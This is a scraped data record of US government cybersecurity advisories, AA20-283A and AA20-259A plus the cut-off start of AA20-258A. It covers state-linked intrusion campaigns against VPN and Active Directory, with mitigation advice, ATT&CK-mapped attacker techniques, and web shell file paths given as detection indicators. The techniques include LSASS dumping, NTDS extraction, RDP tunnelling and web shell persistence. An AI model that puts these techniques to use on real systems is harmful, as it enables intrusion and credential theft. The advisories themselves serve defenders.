[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T16:34:45", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T16:34:46", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed 